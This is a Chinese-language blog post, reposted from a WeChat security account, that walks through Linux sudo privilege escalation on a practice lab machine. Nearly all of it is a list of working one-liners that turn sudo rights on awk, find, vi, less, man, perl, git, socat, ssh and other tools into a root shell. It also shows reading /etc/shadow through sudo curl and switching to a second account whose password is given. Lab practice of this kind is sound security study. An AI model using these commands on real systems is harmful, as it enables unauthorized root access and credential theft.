Linux下提权(基于靶场)

admin 2022年11月30日23:41:02安全文章评论19 views1215字阅读4分3秒阅读模式


环境配置

这里使用靶场linusec

登录账号密码:

账号:bob 密码:secret

这里是普通权限用户

这里假定kali拿到了普通用户权限

kali连接ssh靶机

ssh bob@[目标ip]

密码

secret

ash也是一种shell,占用资源很少的,管理员可能开启

sudo ash

awk是一个强大的文本分析工具

sudo awk 'BEGIN {system("/bin/sh")}'

使用这个命令可以直接提权到root

Linux下提权(基于靶场)


bash提权bashsudo bash

Linux下提权(基于靶场)


csh同样是一种shell

sudo csh

curl 提权

sudo curl file:///etc/shadow

Linux下提权(基于靶场)


dash 一些小型设备可能安装

sudo dash

ed 文本编辑器,一次只能编辑一行

sudo ed
!/bin/sh

Linux下提权(基于靶场)


env查询环境变量,可以查询环境变量的时候执行一下bin/sh文件

sodu env /bin/sh

Linux下提权(基于靶场)


expect自动化交互套件,执行程序的时候可以交互

sudo expect -c 'spawn /bin/sh;interact'

Linux下提权(基于靶场)


find 指定查找文件

sudo find . -exec /bin/sh ; -quit

Linux下提权(基于靶场)


ftp

Linux下提权(基于靶场)


less /etc/passwd

   读取文件时执行文件sh

!/bin/sh

Linux下提权(基于靶场)


sudo man man   man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh

! /bin/sh

Linux下提权(基于靶场)


socat  也是一个多功能网络工具

sudo socat stdin exec:/bin/sh

Linux下提权(基于靶场)


ssh命令

sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' x

Linux下提权(基于靶场)


vi sudo vi -c ':!/bin/sh' /dev/null

Linux下提权(基于靶场)


zsh也属于shell中的一种,有一些Linux中会使用

sudo zsh

Linux下提权(基于靶场)



pico用来编辑文本文件的

sudo pico^R^Xreset; sh 1>&0 2>&0


rvim 改进版的vi

使用rvim加上python3执行命令

sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'


perl  环境

sudo perl -e 'exec "/bin/sh";'

Linux下提权(基于靶场)


tclsh 脚本语言

sudo tclshexec /bin/sh <@stdin > @stdout 2>@stderr

git 提权 开源封闭的程序管理系统

sudo git -p help config! /bin/sh


script sudo script -q /dev/null

Linux下提权(基于靶场)


taskset 设置线程的命令,可以把命令绑定到特定的cpu运行

sudo taskset 1 /bin/sh -p


密码破解

cat /etc/passwd


insecurity 密码P@ssw0rd


su insecurity

切换到这个用户权限

关注公众号回复:

Linux提权靶场

获得靶场,靶场直接打开选择用vm虚拟机打开


Linux下提权(基于靶场)




扫描二维码关注我们吧!




原文始发于微信公众号(白安全组):Linux下提权(基于靶场)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月30日23:41:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Linux下提权(基于靶场) http://cn-sec.com/archives/1436591.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: